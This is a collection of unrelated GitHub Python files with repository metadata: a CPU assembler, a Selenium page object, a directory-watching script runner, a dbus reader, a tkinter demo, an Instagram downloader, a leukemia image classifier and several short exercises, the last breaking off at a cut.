0b1000000000000000,\r\n\r\n \"LDAIN\": 0b1000100000000000,\r\n \"STAOUT\": 0b1001000000000000,\r\n\r\n \"SWP\": 0b1001100000000000,\r\n \"SWPC\": 0b1010000000000000,\r\n\r\n \"HLT\": 0b1010100000000000,\r\n \"NOP\": 0b1011000000000000\r\n}\r\n\r\ndef strToInt(number: str) -> int:\r\n \"Checks if number in str form is appended by 0x or 0b and converts it into appropriate base integer\"\r\n if (len(number) > 1):\r\n if (number[0:2] == \"0x\"):\r\n return int(number[2:],base=16)\r\n elif (number[0:2] == \"0b\"):\r\n return int(number[2:],base=2)\r\n else:\r\n return int(number)\r\n else:\r\n return int(number)\r\n\r\ndef ReadInstructions(file: str) -> list[list]:\r\n \"\"\"\r\n Reads provided .manas assembly file, removes unnecessary whitespace characters and returns list of \r\n instructions and labels.\r\n\r\n Attributes:\r\n - file: Name or path to .manas assembly file to read.\r\n \"\"\"\r\n readInstructions = []\r\n with open(file, \"r\") as f:\r\n for line in f:\r\n instructions = line.rstrip()\r\n instructions = \" \".join(instructions.split()) # Remove all whitespace characters and seperate instructions by only one space\r\n instructions = instructions.split(\" \")\r\n if (instructions[0] != \"\" and instructions[0][0] != \";\"):\r\n readInstructions.append(instructions)\r\n return readInstructions\r\n\r\ndef Assemble(instructionList: list[list], outfile: str) -> None:\r\n \"\"\"\r\n Reads provided list of instructions and labels and assembles it into hex addressed machine code for the\r\n Manas-CPU.\r\n\r\n Attributes:\r\n - instructionList: List of instructions and labels to assemble.\r\n - outfile: Name or path to file the function will write to.\r\n \"\"\"\r\n assembledInstructions = []\r\n lineLength = 16\r\n labels = {}\r\n currentPosition = -1\r\n adjustment = 0\r\n #print(instructionList)\r\n for instruction in instructionList:\r\n currentPosition += 1\r\n if (instruction[0][-1] == \":\"): # do labels and define bytes\r\n if (len(instruction) > 1 and instruction[1][0] != \";\"): # if there is a value after label, then treat label as a variable\r\n labels[instruction[0][0:-1]] = strToInt(instruction[1])\r\n else: # If label only by itself, treat as address\r\n labels[instruction[0][0:-1]] = currentPosition - adjustment # Adjust address for amount of labels\r\n adjustment += 1\r\n #print(labels)\r\n currentPosition = -1\r\n for instruction in instructionList:\r\n currentPosition += 1\r\n if (instruction[0][0:-1] in labels): continue\r\n elif (instruction[0] == \"db\"): # Define one word of data, placed at current position in program memory\r\n assembledInstructions.append(f'{strToInt(instruction[1]):04x}')\r\n elif (instruction[0] in Instruction_codes): # Check if current instruction in opcodes\r\n if (len(instruction) == 1 or instruction[1][0] == \";\"): \r\n assembledInstructions.append(f'{Instruction_codes[instruction[0]]:04x}')\r\n elif (instruction[1] in labels): # Check if argument is label, can be address or variable\r\n assembledInstructions.append(f'{Instruction_codes[instruction[0]] | labels[instruction[1]]:04x}')\r\n else:\r\n assembledInstructions.append(f'{Instruction_codes[instruction[0]] | strToInt(instruction[1]):04x}')\r\n else: \r\n print(f\"Error, cannot assemble instruction: {instruction}!\")\r\n assembledInstructions.append(f'{PRG_END:04x}')\r\n with open(outfile, \"w\") as f:\r\n line = 0\r\n currentPosition = 0\r\n print(\"v3.0 hex words addressed\", file=f)\r\n for i in range(len(assembledInstructions) // lineLength + 1):\r\n print(f'{(line*lineLength):04x}:', file=f, end=\" \")\r\n for y in range(lineLength):\r\n if (currentPosition > len(assembledInstructions)-1):\r\n break\r\n print(assembledInstructions[currentPosition], file=f, end=\" \")\r\n currentPosition += 1\r\n #print(assembledInstructions)\r\n\r\ndef run() -> None:\r\n if (len(sys.argv) < 2):\r\n print(__doc__)\r\n elif (len(sys.argv) == 2):\r\n manasAssemblyfile = sys.argv[1]\r\n outputfile = \"output.manasbin\"\r\n insList = ReadInstructions(manasAssemblyfile)\r\n Assemble(insList, outputfile)\r\n else:\r\n manasAssemblyfile = sys.argv[1]\r\n outputfile = sys.argv[2]\r\n insList = ReadInstructions(manasAssemblyfile)\r\n Assemble(insList, outputfile)\r\n\r\nif __name__ == \"__main__\":\r\n run()","repo_name":"Regaliae/Manas-CPU","sub_path":"Code/Manas-CPU_Assembler.py","file_name":"Manas-CPU_Assembler.py","file_ext":"py","file_size_in_byte":6684,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"24377345819","text":"from base.selenium_driver import SeleniumDriver\n\nimport utilities.custom_logger as cl\nimport logging\n\n\nclass PlaybackTabPage(SeleniumDriver):\n log = cl.customLogger(logging.DEBUG)\n\n def __init__(self, driver):\n super().__init__(driver)\n self.driver = driver\n\n _select_analytics_tab = \"//span[contains(text(),'Analytics')]\"\n _select_playback_tab = \"//a[contains(text(),'Playback')]\"\n\n def select_analytic_playback_tab(self):\n self.elementClick(self._select_analytics_tab, locatorType=\"xpath\")\n self.hold_wait()\n self.elementClick(self._select_playback_tab, locatorType=\"xpath\")\n self.hold_wait()\n\n # _select_floor = \"//label[@class='map-selected-floor']//span[contains(text(), ' 4')]\"\n # _select_floor = \"//label[@class='map-selected-floor']//input[@type='radio']\"\n _select_floor = \"//div[@class='leaflet-control-layers-base']/label//div//span[contains(text(), '4')]\"\n\n def select_floor(self):\n self.elementClick(self._select_floor, locatorType=\"xpath\")\n\n # locators\n\n # _select_venue = \"//mat-select[@role='combobox']\"\n _select_venue = \"//mat-select[@placeholder='Venue']\"\n # _choose_venue = \"//input[@placeholder='Search']\"\n _select_venue_it = \"//span[@class='mat-option-text'][normalize-space()='ICA_2021']\"\n\n def enter_venue_name(self, v_n):\n self.hold_wait()\n self.elementClick(self._select_venue, locatorType=\"xpath\")\n # self.hold_wait()\n # self.backspace_clear(self._select_venue, locatorType=\"xpath\")\n self.hold_wait()\n # self.sendKeys(v_n, self._choose_venue, locatorType=\"xpath\")\n # self.hold_wait()\n self.elementClick(self._select_venue_it, locatorType=\"xpath\")\n self.click_out()\n self.hold_wait()\n\n _click_out = \"//body\"\n\n def click_out(self):\n self.elementClick(self._click_out, locatorType=\"xpath\")\n\n _duration = \"//mat-select[@placeholder='Duration']\"\n # _select_duration_slot = \"//span[contains(text(),'1 hour')]\"\n _select_duration_slot = \"//mat-select[@placeholder='Duration']//span[contains(text(),'8 hours')]\"\n\n # def set_duration(self):\n # self.elementClick(self._duration, locatorType=\"xpath\")\n # self.hold_wait()\n #\n # self.elementClick(self._select_duration_slot)\n # self.hold_wait()\n\n _start_date = \"//input[@data-placeholder='Start Date']\"\n _start_time = \"//input[@data-placeholder='Start time']\"\n\n _end_date = \"//input[@data-placeholder='End Date']\"\n _end_time = \"//input[@data-placeholder='End time']\"\n\n _start_date_error = \"//mat-error[contains(text(),'Start date should be greater than ')]\"\n\n def choose_date_and_time(self, s_date, s_time, e_date, e_time):\n # self.select_floor()\n\n self.backspace_clear(self._start_date, locatorType=\"xpath\")\n self.sendKeys(s_date, self._start_date, locatorType=\"xpath\")\n self.hold_wait()\n self.backspace_clear(self._start_time, locatorType=\"xpath\")\n self.sendKeys(s_time, self._start_time, locatorType=\"xpath\")\n\n self.backspace_clear(self._end_date, locatorType=\"xpath\")\n self.sendKeys(e_date, self._end_date, locatorType=\"xpath\")\n self.hold_wait()\n self.backspace_clear(self._end_time, locatorType=\"xpath\")\n self.sendKeys(e_time, self._end_time, locatorType=\"xpath\")\n\n # start_date_error_msg_appear = self.isElementPresent(self._start_date_error, locatorType=\"xpath\")\n # txt = start_date_error_msg_appear.text\n # print(txt)\n # if start_date_error_msg_appear == True:\n # starting_with = txt[:34]\n # print(starting_with)\n # return starting_with\n\n _time_zone = \"//input[@data-placeholder='Timezone']\"\n _select_element = \"//span[@class='mat-option-text']\"\n\n # _time_zone_name = \"//span[normalize-space()='Africa/Dar_es_Salaam']\"\n\n def select_timezone(self, country_name):\n # self.elementClick(self._time_zone, locatorType=\"xpath\")\n self.hold_wait()\n self.backspace_clear(self._time_zone, locatorType=\"xpath\")\n self.hold_wait()\n self.sendKeys(country_name, self._time_zone, locatorType=\"xpath\")\n self.hold_wait()\n # self.click_out()\n self.elementClick(self._select_element, locatorType=\"xpath\")\n\n # _draw_type = \"//span[contains(text(),'Dot')]\"\n # _draw_type_dot = \"//mat-option[@role='option'][1]\"\n _draw_type = \"//mat-select[@placeholder='Draw Type']\"\n _draw_type_Line = \"//span[@class='mat-option-text'][normalize-space()='Line']\"\n _draw_type_Dot = \"//span[@class='mat-option-text'][normalize-space()='Dot']\"\n _draw_type_Trail = \"//span[@class='mat-option-text'][normalize-space()='Trail']\"\n\n def select_draw_style_dot(self):\n self.elementClick(self._draw_type, locatorType=\"xpath\")\n self.hold_wait()\n self.elementClick(self._draw_type_Dot, locatorType=\"xpath\") # change this xpath as per requirements\n self.hold_wait()\n\n def select_draw_style_line(self):\n self.elementClick(self._draw_type, locatorType=\"xpath\")\n self.hold_wait()\n self.elementClick(self._draw_type_Line, locatorType=\"xpath\") # change this xpath as per requirements\n self.hold_wait()\n\n def select_draw_style_trail(self):\n self.elementClick(self._draw_type, locatorType=\"xpath\")\n self.hold_wait()\n self.elementClick(self._draw_type_Trail, locatorType=\"xpath\") # change this xpath as per requirements\n self.hold_wait()\n\n\n _search_ = \"//span[contains(text(),'Search')]\"\n _search_btn_status_ = \"//div[@class='map-input map-submit-wrapper']//button\"\n\n def click_search(self):\n # self.elementClick(self._search_, locatorType=\"xpath\")\n # self.hold_wait()\n\n get_search_btn_attribute = self.getElement(self._search_btn_status_, locatorType=\"xpath\")\n get_search_btn_stats = get_search_btn_attribute.get_attribute(\"disabled\")\n print(get_search_btn_stats)\n\n # if get_search_btn_stats != 'true':\n # if get_search_btn_stats == 'true':\n if get_search_btn_stats is None:\n self.elementClick(self._search_, locatorType=\"xpath\")\n self.hold_wait()\n return get_search_btn_stats\n\n # def click_search(self):\n # self.elementClick(self._search_, locatorType=\"xpath\")\n # self.hold_wait()\n\n # _select_all_users = \"//label[@for='mat-checkbox-5-input']//div[@class='mat-checkbox-inner-container']\"\n # _select_all_users = \"//div[@class='map-all-tree-users-select']//div[@class='mat-checkbox-inner-container']\"\n _select_all_users = \"//div[@class='map-all-tree-users-select']\"\n\n def select_all_users(self):\n # self.waitForElement(self._select_all_users, locatorType=\"xpath\", timeout=10, pollFrequency=0.5)\n self.hold_wait()\n self.elementClick(self._select_all_users, locatorType=\"xpath\")\n self.hold_wait()\n\n _specific_data_xpath_1 = \"//div[@aria-label='LFA_Test_3.1.2-A2E']\"\n\n def select_specific_data(self):\n self.elementClick(self._specific_data_xpath_1, locatorType=\"xpath\")\n\n _play_arrow = \"//mat-icon[normalize-space()='play_arrow']\"\n\n def play_btn(self):\n # self.isElementPresent(self._play_arrow, locatorType=\"xpath\")\n self.hold_wait()\n try:\n self.elementClick(self._play_arrow, locatorType=\"xpath\")\n self.hold_wait()\n except:\n print(\"sdd\")\n # self.screen_shot(file=\"test_3_3_1_filter_sessions_by_time_playback\")\n\n _select_venue_for_show_zone = \"//mat-select[@placeholder='Venue']\"\n _select_venue_it_for_show_zone = \"//span[@class='mat-option-text'][normalize-space()='TDK_HQ_Nihonbashi']\"\n\n def enter_venue_name_for_show_zone(self):\n self.hold_wait()\n self.elementClick(self._select_venue_for_show_zone, locatorType=\"xpath\")\n self.hold_wait()\n self.elementClick(self._select_venue_it_for_show_zone, locatorType=\"xpath\")\n self.click_out()\n self.hold_wait()\n\n _sel_flr = \"//label[@class='map-selected-floor']//span[contains(text(), '')]\"\n # _set_floor = \"//label[@class='map-selected-floor']//span[contains(text(), ' 26')]\"\n _set_floor = \"//div[@class='leaflet-control-layers-base']/label//div//span[contains(text(), '28F')]\"\n _toggle_show_zone = \"//div[@class='mat-slide-toggle-bar']\"\n\n def show_zones(self):\n self.select_analytic_playback_tab()\n self.enter_venue_name_for_show_zone()\n self.elementClick(self._toggle_show_zone, locatorType=\"xpath\")\n # self.elementClick(self._sel_flr, locatorType=\"xpath\")\n self.elementClick(self._set_floor, locatorType=\"xpath\")\n self.hold_wait()\n get_floor_number_element = self.getElement(self._set_floor, locatorType=\"xpath\")\n get_floor_number_txt = get_floor_number_element.text\n print(get_floor_number_txt)\n # self.screen_shot(file=\"test_3_3_2_show_zones\")\n return get_floor_number_txt\n","repo_name":"hjasani-invn/Venue-Dashboards-Automation-QA","sub_path":"LiveFeed_Analytic_Dashboard/pages/tabs/analytics/playback_page.py","file_name":"playback_page.py","file_ext":"py","file_size_in_byte":8967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"27841188966","text":"#!/usr/bin/env python\n\n'''\nObserve a directory, and then execute argument-provided script\nwhen files within that directory settle down.\n'''\n\n# Imports for groundwork and directory-watching\nfrom inotify.adapters import Inotify, InotifyTree\nfrom getopt import gnu_getopt\nimport logging\nfrom os.path import basename, getsize, isdir, isfile, join, realpath\nfrom threading import Thread\nfrom sys import argv, stderr, stdout\n# Imports for file handling.\nfrom dataclasses import dataclass\nfrom subprocess import Popen as cmd, DEVNULL as devnull\nfrom os import access, walk, X_OK\nfrom queue import Empty as empty, PriorityQueue, Queue\nfrom time import sleep, time\n\ndef _build_logger(label, err = None, out = None):\n obj = logging.getLogger(label)\n obj.setLevel(logging.DEBUG)\n # Err\n err_handler = logging.StreamHandler(err or stderr)\n err_filter = logging.Filter()\n err_filter.filter = lambda record: record.levelno >= logging.WARNING\n err_handler.addFilter(err_filter)\n obj.addHandler(err_handler)\n # Out\n out_handler = logging.StreamHandler(out or stdout)\n out_filter = logging.Filter()\n out_filter.filter = lambda record: record.levelno < logging.WARNING\n out_handler.addFilter(out_filter)\n obj.addHandler(out_handler)\n return obj\n_logger = _build_logger('directory_watcher')\n\ndef _colour_path(path):\n return _colour_text(path, COLOUR_GREEN)\n\ndef _colour_text(text, colour = None):\n colour = colour or COLOUR_BOLD\n # A useful shorthand for applying a colour to a string.\n return '%s%s%s' % (colour, text, COLOUR_OFF)\n\ndef _enable_colours(force = None):\n global COLOUR_BOLD\n global COLOUR_BLUE\n global COLOUR_RED\n global COLOUR_GREEN\n global COLOUR_YELLOW\n global COLOUR_OFF\n if force == True or (force is None and stdout.isatty()):\n # Colours for standard output.\n COLOUR_BOLD = '\\033[1m'\n COLOUR_BLUE = '\\033[1;94m'\n COLOUR_RED = '\\033[1;91m'\n COLOUR_GREEN = '\\033[1;92m'\n COLOUR_YELLOW = '\\033[1;93m'\n COLOUR_OFF = '\\033[0m'\n else:\n # Set to blank values if not to standard output.\n COLOUR_BOLD = ''\n COLOUR_BLUE = ''\n COLOUR_RED = ''\n COLOUR_GREEN = ''\n COLOUR_YELLOW = ''\n COLOUR_OFF = ''\n_enable_colours()\n\ndef _is_executable(path):\n return access(path, X_OK)\n\ndef _parse_args(args_raw):\n\n error = False\n\n def check_number(value_raw):\n try:\n value = int(value_raw)\n if value > 0:\n return value, True\n except ValueError:\n pass\n _logger.error(f'Invalid number: {value_raw}')\n return None, False\n\n def check_path(value_raw, label, check):\n if not check(value_raw):\n _logger.error(f'Invalid {label} path: {_colour_path(value_raw)}')\n return None, False\n return realpath(value_raw), True\n\n def hexit(exit_code):\n _logger.error('Usage: %s dir -s script [-w workers] [--execute-only]' % basename(__file__))\n exit(exit_code)\n try:\n args, operands = gnu_getopt(args_raw, 'hrs:w:', ['execute-only'])\n except Exception as e:\n _logger.error(f'Error parsing arguments: {e}')\n hexit(1)\n\n data = {'dirs':[]}\n script = None\n workers_raw = None\n\n for arg, value_raw in args:\n if arg == '-h':\n hexit(0)\n if arg == '-r':\n data['recursive'] = True\n elif arg == '-s':\n script = value_raw\n elif arg == '-w':\n workers_raw = value_raw\n elif arg == '--execute-only':\n data['execute_only'] = True\n\n good = True\n\n if script:\n data['script'], good_arg = check_path(script, 'script', lambda s: isfile(s) and _is_executable(s))\n good = good and good_arg\n else:\n good = False\n _logger.error('No script provided.')\n\n if workers_raw:\n data['workers'], good_arg = check_number(workers_raw)\n good = good and good_arg\n\n if operands:\n for dir_path_raw in operands:\n dir_path, good_arg = check_path(dir_path_raw, 'target directory', lambda s: isdir(s))\n data['dirs'].append(dir_path)\n good = good and good_arg\n else:\n _logger.error('No directory provided.')\n good = False\n\n if not good:\n hexit(1)\n\n return data\n\ndef _main(args_raw):\n kwargs = _parse_args(args_raw)\n run(**kwargs)\n return 0\n\ndef run(**kwargs):\n\n # Parse arguments\n ##\n\n dirs = kwargs.get('dirs')\n execute_only = kwargs.get('execute_only', False)\n recursive = kwargs.get('recursive', False)\n rest_time = kwargs.get('rest_time', 2)\n script = kwargs.get('script')\n timeout = kwargs.get('timeout')\n workers = kwargs.get('workers', 1)\n\n if execute_only:\n rest_time = 0\n\n # Print Info\n ##\n\n _logger.info(f'Target directory: {_colour_path(dirs[-1])}')\n if recursive:\n _logger.info('Observing directory recursively.')\n _logger.info(f'Script: {_colour_path(script)}')\n _logger.info(f'Script runner threads: {_colour_text(workers)}')\n if rest_time:\n _logger.info(f'Files are at rest after {rest_time}s of inactivity.')\n\n # Initialize support threads\n ##\n\n queue_input = Queue()\n queue_output = PriorityQueue()\n\n # Create monitor thread.\n worker_monitor = MonitorThread(queue_input, queue_output, rest_time)\n worker_monitor.start()\n\n threads = [worker_monitor]\n\n # Create worker threads.\n for i in range(workers):\n t = WorkerThread(script, queue_output)\n t.start()\n threads.append(t)\n\n # Initialize watcher(s)\n ##\n\n if not execute_only:\n if recursive:\n watcher = InotifyTree(dirs[-1])\n else:\n watcher = Inotify()\n watcher.add_watch(dirs[-1])\n\n delete_events = [\n 'IN_DELETE',\n 'IN_MOVED_FROM'\n ]\n\n write_events = [\n 'IN_CLOSE_WRITE',\n 'IN_MOVED_TO'\n ]\n\n # Run watcher(s)\n ##\n\n if execute_only:\n for current_dir in dirs:\n for dirname, _, files in walk(current_dir):\n for filename in files:\n queue_input.put((join(dirname, filename), True))\n worker_monitor.set_done()\n worker_monitor.join()\n for t in threads:\n t.set_done()\n else:\n for event in watcher.event_gen(yield_nones = False):\n (_, type_names, dirname, filename) = event\n\n is_write = len([1 for event_type in type_names if event_type in write_events]) > 0\n is_delete = len([1 for event_type in type_names if event_type in delete_events]) > 0\n\n if not (is_write or is_delete):\n # Not a notable event\n continue\n\n queue_input.put((join(dirname, filename), is_write))\n\n for t in threads:\n t.join()\n\nclass MonitorThread(Thread):\n def __init__(self, queue_in: Queue, queue_out: PriorityQueue, rest_time: float):\n Thread.__init__(self)\n self.__done = False\n self.__queue_in = queue_in\n self.__queue_out = queue_out\n self.__rest_time = rest_time\n\n def set_done(self):\n self.__done = True\n\n def run(self):\n\n data = {}\n\n while True:\n # Load up new items\n while not self.__queue_in.empty():\n path, addition = self.__queue_in.get()\n\n if not addition:\n # if not addition, then deletion\n if path in data and not isfile(path):\n del data[path]\n continue\n\n if path in data:\n # Already filed\n data[path].time = time()\n else:\n # Newly-observed\n if not isfile(path):\n # Not a file, vanished in between\n continue\n\n try:\n data[path] = MonitorInstance(size=getsize(path), time=time())\n except OSError as e:\n # The file vanished since our last safety check\n # or is otherwise unobservable since it was queued.\n _logger.error('Error starting to monitor instance: %s' % str(e))\n pass # Decline to observe\n\n # Review monitored files\n for path in list(data.keys()):\n if not isfile(path):\n del data[path]\n continue\n instance = data.get(path) # Shorthand\n try:\n size = getsize(path)\n if size != instance.size:\n # Update time.\n instance.size = size\n instance.time = time()\n continue\n\n if time() - instance.time >= self.__rest_time:\n if instance.size:\n # Only process the file if it has content.\n _logger.info(f'File at rest: {_colour_path(path)}')\n self.__queue_out.put((instance.size, path))\n del data[path]\n\n except OSError as e:\n _logger.error(f'Error monitoring instance: {e}')\n del data[path]\n continue\n\n # We do not want to do this in the loop-condition.\n if self.__done and not data:\n break\n\n sleep(0.1)\n\n@dataclass\nclass MonitorInstance:\n size: int\n time: float\n\n def __eq__(self, other):\n return self.path == other.path\n\n def __ge__(self, other):\n return self.size >= other.size\n\n def __gt__(self, other):\n return self.size > other.size\n\n def __lt__(self, other):\n return self.size < other.size\n\nclass WorkerThread(Thread):\n def __init__(self, script: str, queue: PriorityQueue):\n Thread.__init__(self)\n self.__done = False\n self.__queue = queue\n self.__script = script\n\n def set_done(self):\n self.__done = True\n\n def run(self):\n while True:\n try:\n size, path = self.__queue.get(timeout=0.2)\n except empty:\n if self.__done:\n break\n continue\n\n if not isfile(path):\n # One last isfile for safety.\n # The file could have been removed after it was added to the queue\n # For now, intentionally ignoring silently.\n continue\n\n if not isfile(self.__script):\n _logger.error(f'Script is no longer available: {_colour_path(self.__script)}')\n continue\n\n if not _is_executable(self.__script):\n _logger.error(f'Script is no longer executable: {_colour_path(self.__script)}')\n continue\n\n _logger.info(f'Handling file: {_colour_path(path)}')\n p = cmd([self.__script, path], stdout=devnull, stderr=devnull)\n p.communicate()\n if p.returncode:\n _logger.error(f'Error with file: {_colour_path(path)}')\n else:\n _logger.info(f'Finished with file: {_colour_path(path)}')\n\nif __name__ == '__main__':\n exit(_main(argv[1:])) # pragma no cover\n","repo_name":"adeutscher/core-tools","sub_path":"scripts/files/watch_directory.py","file_name":"watch_directory.py","file_ext":"py","file_size_in_byte":11432,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"40"} +{"seq_id":"11862809552","text":"import logging\nimport socket\nfrom typing import Callable, Optional\n\nfrom .._private.unmarshaller import Unmarshaller\nfrom ..message import Message\n\n\ndef build_message_reader(\n sock: Optional[socket.socket],\n process: Callable[[Message], None],\n finalize: Callable[[Optional[Exception]], None],\n negotiate_unix_fd: bool,\n) -> Callable[[], None]:\n \"\"\"Build a callable that reads messages from the unmarshaller and passes them to the process function.\"\"\"\n unmarshaller = Unmarshaller(None, sock, negotiate_unix_fd)\n\n def _message_reader() -> None:\n \"\"\"Reads messages from the unmarshaller and passes them to the process function.\"\"\"\n try:\n while True:\n message = unmarshaller._unmarshall()\n if message is None:\n return\n try:\n process(message)\n except Exception as e:\n logging.error(\n \"Unexpected error processing message: %s\", exc_info=True\n )\n # If we are not negotiating unix fds, we can stop reading as soon as we have\n # the buffer is empty as asyncio will call us again when there is more data.\n if (\n not negotiate_unix_fd\n and not unmarshaller._has_another_message_in_buffer()\n ):\n return\n except Exception as e:\n finalize(e)\n\n return _message_reader\n","repo_name":"Bluetooth-Devices/dbus-fast","sub_path":"src/dbus_fast/aio/message_reader.py","file_name":"message_reader.py","file_ext":"py","file_size_in_byte":1498,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"40"} +{"seq_id":"44115971331","text":"from tkinter import *\n\n\nmain = Tk()\nmain.title('YoYo')\nmain.iconbitmap('Mine.ico')\n\n# Frame (that can contain other stuff!) to separate out things visually!\nmy_frame = LabelFrame(main, text='My Frame', padx=360, pady=180)\nmy_frame.pack(padx=8, pady=8)\n# Putting other stuff\nb = Button(my_frame, text='What\\'s up?')\nb.pack() # grid can always be used!\n\nmain.mainloop()\n","repo_name":"samyak1409/tkinter","sub_path":"Codes/7_Frame.py","file_name":"7_Frame.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"73928992441","text":"import requests\nimport urllib3\nfrom constants import APP_ACCESS_TOKEN, BASE_URL\nfrom get_user_id import get_user_id\n\n#defining class\ndef get_users_post(insta_username):\n #function logic\n user_id = get_user_id(insta_username)\n if user_id is None:\n print('The user does not exist')\n exit()\n req_url = BASE_URL + 'users/' + user_id + '/media/recent/?access_token=' + APP_ACCESS_TOKEN\n media_user = requests.get(req_url).json()\n if media_user['meta']['code'] == 200:\n if len(media_user['data']):\n rec_img = media_user['data'][0]['images']['standard_resolution']['url']\n urllib3.disable_warnings()\n conn = urllib3.PoolManager()\n response = conn.request('GET', rec_img)\n f = open('user_post.jpg', 'wb')\n f.write(response.data)\n f.close()\n print('Your post was downloaded')\n else:\n print('Post does not exist!')\n else:\n print('Status code other than 200 received!')\n\n\n","repo_name":"GauravTiwari07/instabot","sub_path":"get_user_posts.py","file_name":"get_user_posts.py","file_ext":"py","file_size_in_byte":1016,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"74305128440","text":"import os\r\nfrom sklearn import metrics\r\nimport keras\r\nimport tensorflow as tf\r\nfrom glob import glob\r\nimport cv2\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom sklearn.model_selection import train_test_split\r\nfrom keras import layers\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\n# Dataset Import\r\nfrom zipfile import ZipFile\r\n\r\ndata_path = 'Leukemia.zip'\r\n\r\nwith ZipFile(data_path) as zip:\r\n zip.extractall('leukemia')\r\n\r\n\r\n# Data Preparation\r\ntrain_path = 'C-NMC_Leukemia/training_data'\r\ntest_path = 'C-NMC_Leukemia/testing_data'\r\nval_path = 'C-NMC_Leukemia/validation_data'\r\n\r\nclasses = os.listdir(f'{train_path}')\r\n\r\nIMG_SIZE = 256\r\nSPLIT = 0.2\r\nEPOCHS = 100\r\nBATCH_SIZE = 61\r\n\r\nX = []\r\nY = []\r\n\r\nresize_list = [train_path, test_path]\r\n\r\nfor p in range(len(resize_list)):\r\n for i, name in enumerate(classes):\r\n images = glob(f'{resize_list[p]}/{name}/*.bmp')\r\n\r\n for image in images:\r\n img = cv2.imread(image)\r\n\r\n X.append(cv2.resize(img, (IMG_SIZE, IMG_SIZE)))\r\n Y.append(i)\r\nX = np.asarray(X)\r\none_h_enc_Y = pd.get_dummies(Y).values\r\n\r\nX_train, X_test, Y_train, Y_test = train_test_split(X, one_h_enc_Y, test_size= SPLIT, random_state= 42)\r\n\r\n\r\n# Creating Model\r\nIMG_SHAPE = (IMG_SIZE, IMG_SIZE, 3)\r\n\r\nbase_model = tf.keras.applications.efficientnet.EfficientNetB3(include_top= False, weights= \"imagenet\", input_shape= IMG_SHAPE, pooling= 'max')\r\n\r\n\r\nmodel = keras.Sequential([\r\n base_model,\r\n layers.BatchNormalization(axis= -1, momentum= 0.99, epsilon= 0.001),\r\n layers.Dense(256, activation= 'relu'),\r\n layers.Dropout(rate= 0.45, seed= 123),\r\n layers.Dense(2, activation= 'softmax')\r\n])\r\n\r\nmodel.compile(optimizer= 'adam', loss='categorical_crossentropy', metrics= ['accuracy'])\r\nprint(model.summary())\r\n\r\n\r\n# Callbacks\r\nfrom keras.callbacks import ModelCheckpoint\r\n\r\ncheckpoint = ModelCheckpoint('output/model_chechpoint.h5',\r\n save_best_only= True,\r\n verbose= 1,\r\n save_weights_only= True,\r\n monitor='val_accuracy')\r\n\r\n\r\n# Model Training\r\nhistory = model.fit(X_train, Y_train,\r\n validation_data= (X_test, Y_test),\r\n batch_size= BATCH_SIZE,\r\n epochs= EPOCHS,\r\n verbose= 1,\r\n callbacks= checkpoint)\r\n","repo_name":"kynivv/Leukemia_Cell_Classification_EfficientNet_CNN","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"27750377260","text":"def solution(s):\n answer = -1\n temp = []\n \n for c in s:\n temp.append(c)\n temp_chr = temp[-2:]\n \n if len(temp)>=2 and temp_chr[0] == temp_chr[1]:\n temp.pop()\n temp.pop()\n \n if not temp:\n answer = 1\n else:\n answer = 0\n\n return answer","repo_name":"khj1998/ProblemSolving","sub_path":"프로그래머스/lv2/12973. 짝지어 제거하기/짝지어 제거하기.py","file_name":"짝지어 제거하기.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"19825026545","text":"## QUESTÃO 1 ## \n# Faça um programa que calcule o aumento de um salário. Ele deve solicitar o \n# valor do salário e a porcentagem do aumento. Exiba o valor do aumento e do \n# novo salário. \n##\n\n##\n# A sua resposta da questão deve ser desenvolvida dentro da função main()!!! \n# Deve-se substituir o comado print existente pelo código da solução.\n# Para a correta execução do programa, a estrutura atual deve ser mantida,\n# substituindo apenas o comando print(questão...) existente.\n##\ndef main():\n print(\"questao 1\")\nx = int(input(\"Qual seu salário atual? \"))\ny = int(input(\"Qual o percentual de aumento? \"))\nz = y * x / 100\nx += z\nprint(\"Seu novo salário será \" + str(x))\n\nif __name__ == '__main__':\n main()\n","repo_name":"cesarschool/cesar-school-fp-2018-2-lista1-gabrielleite751","sub_path":"questoes/questao_1.py","file_name":"questao_1.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"6729264504","text":"P = int(input())\nsw, em, ai, no = 0, 0, 0, 0\n\nfor i in range(P):\n G, C, N = map(int, input().split())\n if G <= 1:\n no += 1\n continue\n\n if C == 1 or C == 2:\n sw += 1\n elif C == 3:\n em += 1\n else:\n ai += 1\n\nprint(sw)\nprint(em)\nprint(ai)\nprint(no)\n","repo_name":"woohyunjng/Coding-Practice","sub_path":"Python/Baekjoon/28000/28289.py","file_name":"28289.py","file_ext":"py","file_size_in_byte":295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"7938118296","text":"\nimport ast\nimport random\n\n# 生成数据的一个小脚本\n\ndef productUserData():\n dataList = []\n # # add 接口\n # addJson = {\n # \"urlpath\": \"user/login\",\n # \"needparam\": True,\n # \"param\": []\n # }\n # param = []\n # for i in range(10):\n # param.append({\n # \"userid\": i,\n # \"name\": \"testuser\" + str(i),\n # \"birthday\": \" 2022-01-01-01\",\n # \"email\": \"microserivce_userName\" + str(i) + \"@163.com\",\n # \"sex\" : random.randint(0, 2),\n # \"phone\": \"121231233\" + str(i),\n # \"type\" : random.randint(0, 4),\n # \"password\" : \"testuser\" + str(i)\n # })\n # addJson['param'] = param\n # dataList.append(addJson)\n\n # get接口\n getJson = {\n \"urlpath\": 